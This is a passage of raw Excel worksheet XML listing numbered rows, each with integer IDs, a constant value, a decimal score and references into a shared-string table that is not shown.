    <row r="7081" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7081" s="1">
        <v>7079</v>
      </c>
      <c r="B7081">
        <v>1291</v>
      </c>
      <c r="C7081">
        <v>1291</v>
      </c>
      <c r="D7081">
        <v>4</v>
      </c>
      <c r="E7081">
        <v>0.99550002813339233</v>
      </c>
      <c r="F7081" t="s">
        <v>13461</v>
      </c>
      <c r="G7081" t="s">
        <v>14008</v>
      </c>
      <c r="H7081" t="s">
        <v>14009</v>
      </c>
    </row>
    <row r="7082" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7082" s="1">
        <v>7080</v>
      </c>
      <c r="B7082">
        <v>1290</v>
      </c>
      <c r="C7082">
        <v>1290</v>
      </c>
      <c r="D7082">
        <v>4</v>
      </c>
      <c r="E7082">
        <v>0.5274999737739563</v>
      </c>
      <c r="F7082" t="s">
        <v>13461</v>
      </c>
      <c r="G7082" t="s">
        <v>14010</v>
      </c>
      <c r="H7082" t="s">
        <v>14011</v>
      </c>
    </row>
    <row r="7083" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7083" s="1">
        <v>7081</v>
      </c>
      <c r="B7083">
        <v>1279</v>
      </c>
      <c r="C7083">
        <v>1279</v>
      </c>
      <c r="D7083">
        <v>4</v>
      </c>
      <c r="E7083">
        <v>0.94129997491836548</v>
      </c>
      <c r="F7083" t="s">
        <v>13461</v>
      </c>
      <c r="G7083" t="s">
        <v>14012</v>
      </c>
      <c r="H7083" t="s">
        <v>14013</v>
      </c>
    </row>
    <row r="7084" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7084" s="1">
        <v>7082</v>
      </c>
      <c r="B7084">
        <v>1274</v>
      </c>
      <c r="C7084">
        <v>1274</v>
      </c>
      <c r="D7084">
        <v>4</v>
      </c>
      <c r="E7084">
        <v>0.84210002422332764</v>
      </c>
      <c r="F7084" t="s">
        <v>13461</v>
      </c>
      <c r="G7084" t="s">
        <v>14014</v>
      </c>
      <c r="H7084" t="s">
        <v>14015</v>
      </c>
    </row>
    <row r="7085" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7085" s="1">
        <v>7083</v>
      </c>
      <c r="B7085">
        <v>1269</v>
      </c>
      <c r="C7085">
        <v>1269</v>
      </c>
      <c r="D7085">
        <v>4</v>
      </c>
      <c r="E7085">
        <v>0.51139998435974121</v>
      </c>
      <c r="F7085" t="s">
        <v>13461</v>
      </c>
      <c r="G7085" t="s">
        <v>14016</v>
      </c>
      <c r="H7085" t="s">
        <v>14017</v>
      </c>
    </row>
    <row r="7086" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7086" s="1">
        <v>7084</v>
      </c>
      <c r="B7086">
        <v>1268</v>
      </c>
      <c r="C7086">
        <v>1268</v>
      </c>
      <c r="D7086">
        <v>4</v>
      </c>
      <c r="E7086">
        <v>0.67919999361038208</v>
      </c>
      <c r="F7086" t="s">
        <v>13461</v>
      </c>
      <c r="G7086" t="s">
        <v>14018</v>
      </c>
      <c r="H7086" t="s">
        <v>14019</v>
      </c>
    </row>
    <row r="7087" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7087" s="1">
        <v>7085</v>
      </c>
      <c r="B7087">
        <v>1267</v>
      </c>
      <c r="C7087">
        <v>1267</v>
      </c>
      <c r="D7087">
        <v>4</v>
      </c>
      <c r="E7087">
        <v>0.68120002746582031</v>
      </c>
      <c r="F7087" t="s">
        <v>13461</v>
      </c>
      <c r="G7087" t="s">
        <v>14020</v>
      </c>
      <c r="H7087" t="s">
        <v>14021</v>
      </c>
    </row>
    <row r="7088" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7088" s="1">
        <v>7086</v>
      </c>
      <c r="B7088">
        <v>1266</v>
      </c>
      <c r="C7088">
        <v>1266</v>
      </c>
      <c r="D7088">
        <v>4</v>
      </c>
      <c r="E7088">
        <v>0.99049997329711914</v>
      </c>
      <c r="F7088" t="s">
        <v>13461</v>
      </c>
      <c r="G7088" t="s">
        <v>14022</v>
      </c>
      <c r="H7088" t="s">
        <v>14023</v>
      </c>
    </row>
    <row r="7089" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7089" s="1">
        <v>7087</v>
      </c>
      <c r="B7089">
        <v>1264</v>
      </c>
      <c r="C7089">
        <v>1264</v>
      </c>
      <c r="D7089">
        <v>4</v>
      </c>
      <c r="E7089">
        <v>0.99949997663497925</v>
      </c>
      <c r="F7089" t="s">
        <v>13461</v>
      </c>
      <c r="G7089" t="s">
        <v>14024</v>
      </c>
      <c r="H7089" t="s">
        <v>14025</v>
      </c>
    </row>
    <row r="7090" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7090" s="1">
        <v>7088</v>
      </c>
      <c r="B7090">
        <v>1253</v>
      </c>
      <c r="C7090">
        <v>1253</v>
      </c>
      <c r="D7090">
        <v>4</v>
      </c>
      <c r="E7090">
        <v>0.99199998378753662</v>
      </c>
      <c r="F7090" t="s">
        <v>13461</v>
      </c>
      <c r="G7090" t="s">
        <v>14026</v>
      </c>
      <c r="H7090" t="s">
        <v>14027</v>
      </c>
    </row>
    <row r="7091" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7091" s="1">
        <v>7089</v>
      </c>
      <c r="B7091">
        <v>1251</v>
      </c>
      <c r="C7091">
        <v>1251</v>
      </c>
      <c r="D7091">
        <v>4</v>
      </c>
      <c r="E7091">
        <v>0.95520001649856567</v>
      </c>
      <c r="F7091" t="s">
        <v>13461</v>
      </c>
      <c r="G7091" t="s">
        <v>14028</v>
      </c>
      <c r="H7091" t="s">
        <v>14029</v>
      </c>
    </row>
    <row r="7092" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7092" s="1">
        <v>7090</v>
      </c>
      <c r="B7092">
        <v>220</v>
      </c>
      <c r="C7092">
        <v>220</v>
      </c>
      <c r="D7092">
        <v>4</v>
      </c>
      <c r="E7092">
        <v>0.99739998579025269</v>
      </c>
      <c r="F7092" t="s">
        <v>13461</v>
      </c>
      <c r="G7092" t="s">
        <v>14030</v>
      </c>
      <c r="H7092" t="s">
        <v>14031</v>
      </c>
    </row>
    <row r="7093" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7093" s="1">
        <v>7091</v>
      </c>
      <c r="B7093">
        <v>228</v>
      </c>
      <c r="C7093">
        <v>228</v>
      </c>
      <c r="D7093">
        <v>4</v>
      </c>
      <c r="E7093">
        <v>0.82209998369216919</v>
      </c>
      <c r="F7093" t="s">
        <v>13461</v>
      </c>
      <c r="G7093" t="s">
        <v>14032</v>
      </c>
      <c r="H7093" t="s">
        <v>14033</v>
      </c>
    </row>
    <row r="7094" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7094" s="1">
        <v>7092</v>
      </c>
      <c r="B7094">
        <v>234</v>
      </c>
      <c r="C7094">
        <v>234</v>
      </c>
      <c r="D7094">
        <v>4</v>
      </c>
      <c r="E7094">
        <v>0.87650001049041748</v>
      </c>
      <c r="F7094" t="s">
        <v>13461</v>
      </c>
      <c r="G7094" t="s">
        <v>14034</v>
      </c>
      <c r="H7094" t="s">
        <v>14035</v>
      </c>
    </row>
    <row r="7095" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7095" s="1">
        <v>7093</v>
      </c>
      <c r="B7095">
        <v>7350</v>
      </c>
      <c r="C7095">
        <v>7350</v>
      </c>
      <c r="D7095">
        <v>4</v>
      </c>
      <c r="E7095">
        <v>0.99199998378753662</v>
      </c>
      <c r="F7095" t="s">
        <v>13461</v>
      </c>
      <c r="G7095" t="s">
        <v>14036</v>
      </c>
      <c r="H7095" t="s">
        <v>14037</v>
      </c>
    </row>
    <row r="7096" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7096" s="1">
        <v>7094</v>
      </c>
      <c r="B7096">
        <v>1227</v>
      </c>
      <c r="C7096">
        <v>1227</v>
      </c>
      <c r="D7096">
        <v>4</v>
      </c>
      <c r="E7096">
        <v>0.47170001268386841</v>
      </c>
      <c r="F7096" t="s">
        <v>13461</v>
      </c>
      <c r="G7096" t="s">
        <v>14038</v>
      </c>
      <c r="H7096" t="s">
        <v>14039</v>
      </c>
    </row>
    <row r="7097" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7097" s="1">
        <v>7095</v>
      </c>
      <c r="B7097">
        <v>1222</v>
      </c>
      <c r="C7097">
        <v>1222</v>
      </c>
      <c r="D7097">
        <v>4</v>
      </c>
      <c r="E7097">
        <v>0.99529999494552612</v>
      </c>
      <c r="F7097" t="s">
        <v>13461</v>
      </c>
      <c r="G7097" t="s">
        <v>14040</v>
      </c>
      <c r="H7097" t="s">
        <v>14041</v>
      </c>
    </row>
    <row r="7098" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7098" s="1">
        <v>7096</v>
      </c>
      <c r="B7098">
        <v>197</v>
      </c>
      <c r="C7098">
        <v>197</v>
      </c>
      <c r="D7098">
        <v>4</v>
      </c>
      <c r="E7098">
        <v>0.99220001697540283</v>
      </c>
      <c r="F7098" t="s">
        <v>13461</v>
      </c>
      <c r="G7098" t="s">
        <v>14042</v>
      </c>
      <c r="H7098" t="s">
        <v>14043</v>
      </c>
    </row>
    <row r="7099" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7099" s="1">
        <v>7097</v>
      </c>
      <c r="B7099">
        <v>294</v>
      </c>
      <c r="C7099">
        <v>294</v>
      </c>
      <c r="D7099">
        <v>4</v>
      </c>
      <c r="E7099">
        <v>0.53789997100830078</v>
      </c>
      <c r="F7099" t="s">
        <v>13461</v>
      </c>
      <c r="G7099" t="s">
        <v>14044</v>
      </c>
      <c r="H7099" t="s">
        <v>14045</v>
      </c>
    </row>
    <row r="7100" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7100" s="1">
        <v>7098</v>
      </c>
      <c r="B7100">
        <v>7387</v>
      </c>
      <c r="C7100">
        <v>7387</v>
      </c>
      <c r="D7100">
        <v>4</v>
      </c>
      <c r="E7100">
        <v>0.85500001907348633</v>
      </c>
      <c r="F7100" t="s">
        <v>13461</v>
      </c>
      <c r="G7100" t="s">
        <v>14046</v>
      </c>
      <c r="H7100" t="s">
        <v>14047</v>
      </c>
    </row>
    <row r="7101" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7101" s="1">
        <v>7099</v>
      </c>
      <c r="B7101">
        <v>344</v>
      </c>
      <c r="C7101">
        <v>344</v>
      </c>
      <c r="D7101">
        <v>4</v>
      </c>
      <c r="E7101">
        <v>0.87430000305175781</v>
      </c>
      <c r="F7101" t="s">
        <v>13461</v>
      </c>
      <c r="G7101" t="s">
        <v>14048</v>
      </c>
      <c r="H7101" t="s">
        <v>14049</v>
      </c>
    </row>
    <row r="7102" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7102" s="1">
        <v>7100</v>
      </c>
      <c r="B7102">
        <v>1084</v>
      </c>
      <c r="C7102">
        <v>1084</v>
      </c>
      <c r="D7102">
        <v>4</v>
      </c>
      <c r="E7102">
        <v>0.72970002889633179</v>
      </c>
      <c r="F7102" t="s">
        <v>13461</v>
      </c>
      <c r="G7102" t="s">
        <v>14050</v>
      </c>
      <c r="H7102" t="s">
        <v>14051</v>
      </c>
    </row>
    <row r="7103" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7103" s="1">
        <v>7101</v>
      </c>
      <c r="B7103">
        <v>1073</v>
      </c>
      <c r="C7103">
        <v>1073</v>
      </c>
      <c r="D7103">
        <v>4</v>
      </c>
      <c r="E7103">
        <v>0.90850001573562622</v>
      </c>
      <c r="F7103" t="s">
        <v>13461</v>
      </c>
      <c r="G7103" t="s">
        <v>14052</v>
      </c>
      <c r="H7103" t="s">
        <v>14053</v>
      </c>
    </row>
    <row r="7104" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7104" s="1">
        <v>7102</v>
      </c>
      <c r="B7104">
        <v>353</v>
      </c>
      <c r="C7104">
        <v>353</v>
      </c>
      <c r="D7104">
        <v>4</v>
      </c>
      <c r="E7104">
        <v>0.97079998254776001</v>
      </c>
      <c r="F7104" t="s">
        <v>13461</v>
      </c>
      <c r="G7104" t="s">
        <v>14054</v>
      </c>
      <c r="H7104" t="s">
        <v>14055</v>
      </c>
    </row>
    <row r="7105" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7105" s="1">
        <v>7103</v>
      </c>
      <c r="B7105">
        <v>1072</v>
      </c>
      <c r="C7105">
        <v>1072</v>
      </c>
      <c r="D7105">
        <v>4</v>
      </c>
      <c r="E7105">
        <v>0.63349997997283936</v>
      </c>
      <c r="F7105" t="s">
        <v>13461</v>
      </c>
      <c r="G7105" t="s">
        <v>14056</v>
      </c>
      <c r="H7105" t="s">
        <v>14057</v>
      </c>
    </row>
    <row r="7106" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7106" s="1">
        <v>7104</v>
      </c>
      <c r="B7106">
        <v>354</v>
      </c>
      <c r="C7106">
        <v>354</v>
      </c>
      <c r="D7106">
        <v>4</v>
      </c>
      <c r="E7106">
        <v>0.99839997291564941</v>
      </c>
      <c r="F7106" t="s">
        <v>13461</v>
      </c>
      <c r="G7106" t="s">
        <v>14058</v>
      </c>
      <c r="H7106" t="s">
        <v>14059</v>
      </c>
    </row>
    <row r="7107" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7107" s="1">
        <v>7105</v>
      </c>
      <c r="B7107">
        <v>1060</v>
      </c>
      <c r="C7107">
        <v>1060</v>
      </c>
      <c r="D7107">
        <v>4</v>
      </c>
      <c r="E7107">
        <v>0.96679997444152832</v>
      </c>
      <c r="F7107" t="s">
        <v>13461</v>
      </c>
      <c r="G7107" t="s">
        <v>14060</v>
      </c>
      <c r="H7107" t="s">
        <v>14061</v>
      </c>
    </row>
    <row r="7108" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7108" s="1">
        <v>7106</v>
      </c>
      <c r="B7108">
        <v>1059</v>
      </c>
      <c r="C7108">
        <v>1059</v>
      </c>
      <c r="D7108">
        <v>4</v>
      </c>
      <c r="E7108">
        <v>0.80849999189376831</v>
      </c>
      <c r="F7108" t="s">
        <v>13461</v>
      </c>
      <c r="G7108" t="s">
        <v>14062</v>
      </c>
      <c r="H7108" t="s">
        <v>14063</v>
      </c>
    </row>
    <row r="7109" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7109" s="1">
        <v>7107</v>
      </c>
      <c r="B7109">
        <v>1058</v>
      </c>
      <c r="C7109">
        <v>1058</v>
      </c>
      <c r="D7109">
        <v>4</v>
      </c>
      <c r="E7109">
        <v>0.94940000772476196</v>
      </c>
      <c r="F7109" t="s">
        <v>13461</v>
      </c>
      <c r="G7109" t="s">
        <v>14064</v>
      </c>
      <c r="H7109" t="s">
        <v>14065</v>
      </c>
    </row>
    <row r="7110" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7110" s="1">
        <v>7108</v>
      </c>
      <c r="B7110">
        <v>7761</v>
      </c>
      <c r="C7110">
        <v>7761</v>
      </c>
      <c r="D7110">
        <v>4</v>
      </c>
      <c r="E7110">
        <v>0.67909997701644897</v>
      </c>
      <c r="F7110" t="s">
        <v>13461</v>
      </c>
      <c r="G7110" t="s">
        <v>14066</v>
      </c>
      <c r="H7110" t="s">
        <v>14067</v>
      </c>
    </row>
    <row r="7111" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7111" s="1">
        <v>7109</v>
      </c>
      <c r="B7111">
        <v>1056</v>
      </c>
      <c r="C7111">
        <v>1056</v>
      </c>
      <c r="D7111">
        <v>4</v>
      </c>
      <c r="E7111">
        <v>0.87050002813339233</v>
      </c>
      <c r="F7111" t="s">
        <v>13461</v>
      </c>
      <c r="G7111" t="s">
        <v>14068</v>
      </c>
      <c r="H7111" t="s">
        <v>14069</v>
      </c>
    </row>
    <row r="7112" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7112" s="1">
        <v>7110</v>
      </c>
      <c r="B7112">
        <v>1055</v>
      </c>
      <c r="C7112">
        <v>1055</v>
      </c>
      <c r="D7112">
        <v>4</v>
      </c>
      <c r="E7112">
        <v>0.9976000189781189</v>
      </c>
      <c r="F7112" t="s">
        <v>13461</v>
      </c>
      <c r="G7112" t="s">
        <v>14070</v>
      </c>
      <c r="H7112" t="s">
        <v>14071</v>
      </c>
    </row>
    <row r="7113" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7113" s="1">
        <v>7111</v>
      </c>
      <c r="B7113">
        <v>1054</v>
      </c>
      <c r="C7113">
        <v>1054</v>
      </c>
      <c r="D7113">
        <v>4</v>
      </c>
      <c r="E7113">
        <v>0.78909999132156372</v>
      </c>
      <c r="F7113" t="s">
        <v>13461</v>
      </c>
      <c r="G7113" t="s">
        <v>14072</v>
      </c>
      <c r="H7113" t="s">
        <v>14073</v>
      </c>
    </row>
    <row r="7114" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7114" s="1">
        <v>7112</v>
      </c>
      <c r="B7114">
        <v>1053</v>
      </c>
      <c r="C7114">
        <v>1053</v>
      </c>
      <c r="D7114">
        <v>4</v>
      </c>
      <c r="E7114">
        <v>0.97460001707077026</v>
      </c>
      <c r="F7114" t="s">
        <v>13461</v>
      </c>
      <c r="G7114" t="s">
        <v>14074</v>
      </c>
      <c r="H7114" t="s">
        <v>14075</v>
      </c>
    </row>
    <row r="7115" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7115" s="1">
        <v>7113</v>
      </c>
      <c r="B7115">
        <v>1050</v>
      </c>
      <c r="C7115">
        <v>1050</v>
      </c>
      <c r="D7115">
        <v>4</v>
      </c>
      <c r="E7115">
        <v>0.78899997472763062</v>
      </c>
      <c r="F7115" t="s">
        <v>13461</v>
      </c>
      <c r="G7115" t="s">
        <v>14076</v>
      </c>
      <c r="H7115" t="s">
        <v>14073</v>
      </c>
    </row>
    <row r="7116" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7116" s="1">
        <v>7114</v>
      </c>
      <c r="B7116">
        <v>1049</v>
      </c>
      <c r="C7116">
        <v>1049</v>
      </c>
      <c r="D7116">
        <v>4</v>
      </c>
      <c r="E7116">
        <v>0.73479998111724854</v>
      </c>
      <c r="F7116" t="s">
        <v>13461</v>
      </c>
      <c r="G7116" t="s">
        <v>14077</v>
      </c>
      <c r="H7116" t="s">
        <v>14078</v>
      </c>
    </row>
    <row r="7117" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7117" s="1">
        <v>7115</v>
      </c>
      <c r="B7117">
        <v>1047</v>
      </c>
      <c r="C7117">
        <v>1047</v>
      </c>
      <c r="D7117">
        <v>4</v>
      </c>
      <c r="E7117">
        <v>0.4862000048160553</v>
      </c>
      <c r="F7117" t="s">
        <v>13461</v>
      </c>
      <c r="G7117" t="s">
        <v>14079</v>
      </c>
      <c r="H7117" t="s">
        <v>14080</v>
      </c>
    </row>
    <row r="7118" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7118" s="1">
        <v>7116</v>
      </c>
      <c r="B7118">
        <v>1042</v>
      </c>
      <c r="C7118">
        <v>1042</v>
      </c>
      <c r="D7118">
        <v>4</v>
      </c>
      <c r="E7118">
        <v>0.90570002794265747</v>
      </c>
      <c r="F7118" t="s">
        <v>13461</v>
      </c>
      <c r="G7118" t="s">
        <v>14081</v>
      </c>
      <c r="H7118" t="s">
        <v>14082</v>
      </c>
    </row>
    <row r="7119" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7119" s="1">
        <v>7117</v>
      </c>
      <c r="B7119">
        <v>372</v>
      </c>
      <c r="C7119">
        <v>372</v>
      </c>
      <c r="D7119">
        <v>4</v>
      </c>
      <c r="E7119">
        <v>0.553600013256073</v>
      </c>
      <c r="F7119" t="s">
        <v>13461</v>
      </c>
      <c r="G7119" t="s">
        <v>14083</v>
      </c>
      <c r="H7119" t="s">
        <v>14084</v>
      </c>
    </row>
    <row r="7120" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7120" s="1">
        <v>7118</v>
      </c>
      <c r="B7120">
        <v>1041</v>
      </c>
      <c r="C7120">
        <v>1041</v>
      </c>
      <c r="D7120">
        <v>4</v>
      </c>
      <c r="E7120">
        <v>0.99839997291564941</v>
      </c>
      <c r="F7120" t="s">
        <v>13461</v>
      </c>
      <c r="G7120" t="s">
        <v>14085</v>
      </c>
      <c r="H7120" t="s">
        <v>14086</v>
      </c>
    </row>
    <row r="7121" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7121" s="1">
        <v>7119</v>
      </c>
      <c r="B7121">
        <v>1040</v>
      </c>
      <c r="C7121">
        <v>1040</v>
      </c>
      <c r="D7121">
        <v>4</v>
      </c>
      <c r="E7121">
        <v>0.76969999074935913</v>
      </c>
      <c r="F7121" t="s">
        <v>13461</v>
      </c>
      <c r="G7121" t="s">
        <v>14087</v>
      </c>
      <c r="H7121" t="s">
        <v>14088</v>
      </c>
    </row>
    <row r="7122" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7122" s="1">
        <v>7120</v>
      </c>
      <c r="B7122">
        <v>1039</v>
      </c>
      <c r="C7122">
        <v>1039</v>
      </c>
      <c r="D7122">
        <v>4</v>
      </c>
      <c r="E7122">
        <v>0.99940001964569092</v>
      </c>
      <c r="F7122" t="s">
        <v>13461</v>
      </c>
      <c r="G7122" t="s">
        <v>14089</v>
      </c>
      <c r="H7122" t="s">
        <v>14090</v>
      </c>
    </row>
    <row r="7123" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7123" s="1">
        <v>7121</v>
      </c>
      <c r="B7123">
        <v>7750</v>
      </c>
      <c r="C7123">
        <v>7750</v>
      </c>
      <c r="D7123">
        <v>4</v>
      </c>
      <c r="E7123">
        <v>0.51980000734329224</v>
      </c>
      <c r="F7123" t="s">
        <v>13461</v>
      </c>
      <c r="G7123" t="s">
        <v>14091</v>
      </c>
      <c r="H7123" t="s">
        <v>14092</v>
      </c>
    </row>
    <row r="7124" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7124" s="1">
        <v>7122</v>
      </c>
      <c r="B7124">
        <v>1015</v>
      </c>
      <c r="C7124">
        <v>1015</v>
      </c>
      <c r="D7124">
        <v>4</v>
      </c>
      <c r="E7124">
        <v>0.54180002212524414</v>
      </c>
      <c r="F7124" t="s">
        <v>13461</v>
      </c>
      <c r="G7124" t="s">
        <v>14093</v>
      </c>
      <c r="H7124" t="s">
        <v>14094</v>
      </c>
    </row>
    <row r="7125" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7125" s="1">
        <v>7123</v>
      </c>
      <c r="B7125">
        <v>7450</v>
      </c>
      <c r="C7125">
        <v>7450</v>
      </c>
      <c r="D7125">
        <v>4</v>
      </c>
      <c r="E7125">
        <v>0.99210000038146973</v>
      </c>
      <c r="F7125" t="s">
        <v>13461</v>
      </c>
      <c r="G7125" t="s">
        <v>14095</v>
      </c>
      <c r="H7125" t="s">
        <v>14096</v>
      </c>
    </row>
    <row r="7126" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7126" s="1">
        <v>7124</v>
      </c>
      <c r="B7126">
        <v>394</v>
      </c>
      <c r="C7126">
        <v>394</v>
      </c>
      <c r="D7126">
        <v>4</v>
      </c>
      <c r="E7126">
        <v>0.50040000677108765</v>
      </c>
      <c r="F7126" t="s">
        <v>13461</v>
      </c>
      <c r="G7126" t="s">
        <v>14097</v>
      </c>
      <c r="H7126" t="s">
        <v>14098</v>
      </c>
    </row>
    <row r="7127" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7127" s="1">
        <v>7125</v>
      </c>
      <c r="B7127">
        <v>7454</v>
      </c>
      <c r="C7127">
        <v>7454</v>
      </c>
      <c r="D7127">
        <v>4</v>
      </c>
      <c r="E7127">
        <v>0.45800000429153442</v>
      </c>
      <c r="F7127" t="s">
        <v>13461</v>
      </c>
      <c r="G7127" t="s">
        <v>14099</v>
      </c>
      <c r="H7127" t="s">
        <v>14100</v>
      </c>
    </row>
    <row r="7128" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7128" s="1">
        <v>7126</v>
      </c>
      <c r="B7128">
        <v>1007</v>
      </c>
      <c r="C7128">
        <v>1007</v>
      </c>
      <c r="D7128">
        <v>4</v>
      </c>
      <c r="E7128">
        <v>0.84340000152587891</v>
      </c>
      <c r="F7128" t="s">
        <v>13461</v>
      </c>
      <c r="G7128" t="s">
        <v>14101</v>
      </c>
      <c r="H7128" t="s">
        <v>14102</v>
      </c>
    </row>
    <row r="7129" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7129" s="1">
        <v>7127</v>
      </c>
      <c r="B7129">
        <v>7457</v>
      </c>
      <c r="C7129">
        <v>7457</v>
      </c>
      <c r="D7129">
        <v>4</v>
      </c>
      <c r="E7129">
        <v>0.99980002641677856</v>
      </c>
      <c r="F7129" t="s">
        <v>13461</v>
      </c>
      <c r="G7129" t="s">
        <v>14103</v>
      </c>
      <c r="H7129" t="s">
        <v>14104</v>
      </c>
    </row>
    <row r="7130" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7130" s="1">
        <v>7128</v>
      </c>
      <c r="B7130">
        <v>1085</v>
      </c>
      <c r="C7130">
        <v>1085</v>
      </c>
      <c r="D7130">
        <v>4</v>
      </c>
      <c r="E7130">
        <v>0.85930001735687256</v>
      </c>
      <c r="F7130" t="s">
        <v>13461</v>
      </c>
      <c r="G7130" t="s">
        <v>14105</v>
      </c>
      <c r="H7130" t="s">
        <v>14106</v>
      </c>
    </row>
    <row r="7131" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7131" s="1">
        <v>7129</v>
      </c>
      <c r="B7131">
        <v>7385</v>
      </c>
      <c r="C7131">
        <v>7385</v>
      </c>
      <c r="D7131">
        <v>4</v>
      </c>
      <c r="E7131">
        <v>0.61110001802444458</v>
      </c>
      <c r="F7131" t="s">
        <v>13461</v>
      </c>
      <c r="G7131" t="s">
        <v>14107</v>
      </c>
      <c r="H7131" t="s">
        <v>14108</v>
      </c>
    </row>
    <row r="7132" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7132" s="1">
        <v>7130</v>
      </c>
      <c r="B7132">
        <v>1086</v>
      </c>
      <c r="C7132">
        <v>1086</v>
      </c>
      <c r="D7132">
        <v>4</v>
      </c>
      <c r="E7132">
        <v>0.73360002040863037</v>
      </c>
      <c r="F7132" t="s">
        <v>13461</v>
      </c>
      <c r="G7132" t="s">
        <v>14109</v>
      </c>
      <c r="H7132" t="s">
        <v>14110</v>
      </c>
    </row>
    <row r="7133" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7133" s="1">
        <v>7131</v>
      </c>
      <c r="B7133">
        <v>7418</v>
      </c>
      <c r="C7133">
        <v>7418</v>
      </c>
      <c r="D7133">
        <v>4</v>
      </c>
      <c r="E7133">
        <v>0.616100013256073</v>
      </c>
      <c r="F7133" t="s">
        <v>13461</v>
      </c>
      <c r="G7133" t="s">
        <v>14111</v>
      </c>
      <c r="H7133" t="s">
        <v>14112</v>
      </c>
    </row>
    <row r="7134" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7134" s="1">
        <v>7132</v>
      </c>
      <c r="B7134">
        <v>7388</v>
      </c>
      <c r="C7134">
        <v>7388</v>
      </c>
      <c r="D7134">
        <v>4</v>
      </c>
      <c r="E7134">
        <v>0.98739999532699585</v>
      </c>
      <c r="F7134" t="s">
        <v>13461</v>
      </c>
      <c r="G7134" t="s">
        <v>14113</v>
      </c>
      <c r="H7134" t="s">
        <v>14114</v>
      </c>
    </row>
    <row r="7135" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7135" s="1">
        <v>7133</v>
      </c>
      <c r="B7135">
        <v>1166</v>
      </c>
      <c r="C7135">
        <v>1166</v>
      </c>
      <c r="D7135">
        <v>4</v>
      </c>
      <c r="E7135">
        <v>0.6589999794960022</v>
      </c>
      <c r="F7135" t="s">
        <v>13461</v>
      </c>
      <c r="G7135" t="s">
        <v>14115</v>
      </c>
      <c r="H7135" t="s">
        <v>14116</v>
      </c>
    </row>
    <row r="7136" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7136" s="1">
        <v>7134</v>
      </c>
      <c r="B7136">
        <v>7791</v>
      </c>
      <c r="C7136">
        <v>7791</v>
      </c>
      <c r="D7136">
        <v>4</v>
      </c>
      <c r="E7136">
        <v>0.98299998044967651</v>
      </c>
      <c r="F7136" t="s">
        <v>13461</v>
      </c>
      <c r="G7136" t="s">
        <v>14117</v>
      </c>
      <c r="H7136" t="s">
        <v>14118</v>
      </c>
    </row>
    <row r="7137" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7137" s="1">
        <v>7135</v>
      </c>
      <c r="B7137">
        <v>7790</v>
      </c>
      <c r="C7137">
        <v>7790</v>
      </c>
      <c r="D7137">
        <v>4</v>
      </c>
      <c r="E7137">
        <v>0.46029999852180481</v>
      </c>
      <c r="F7137" t="s">
        <v>13461</v>
      </c>
      <c r="G7137" t="s">
        <v>14119</v>
      </c>
      <c r="H7137" t="s">
        <v>14120</v>
      </c>
    </row>
    <row r="7138" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7138" s="1">
        <v>7136</v>
      </c>
      <c r="B7138">
        <v>1160</v>
      </c>
      <c r="C7138">
        <v>1160</v>
      </c>
      <c r="D7138">
        <v>4</v>
      </c>
      <c r="E7138">
        <v>0.77469998598098755</v>
      </c>
      <c r="F7138" t="s">
        <v>13461</v>
      </c>
      <c r="G7138" t="s">
        <v>14121</v>
      </c>
      <c r="H7138" t="s">
        <v>14122</v>
      </c>
    </row>
    <row r="7139" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7139" s="1">
        <v>7137</v>
      </c>
      <c r="B7139">
        <v>1157</v>
      </c>
      <c r="C7139">
        <v>1157</v>
      </c>
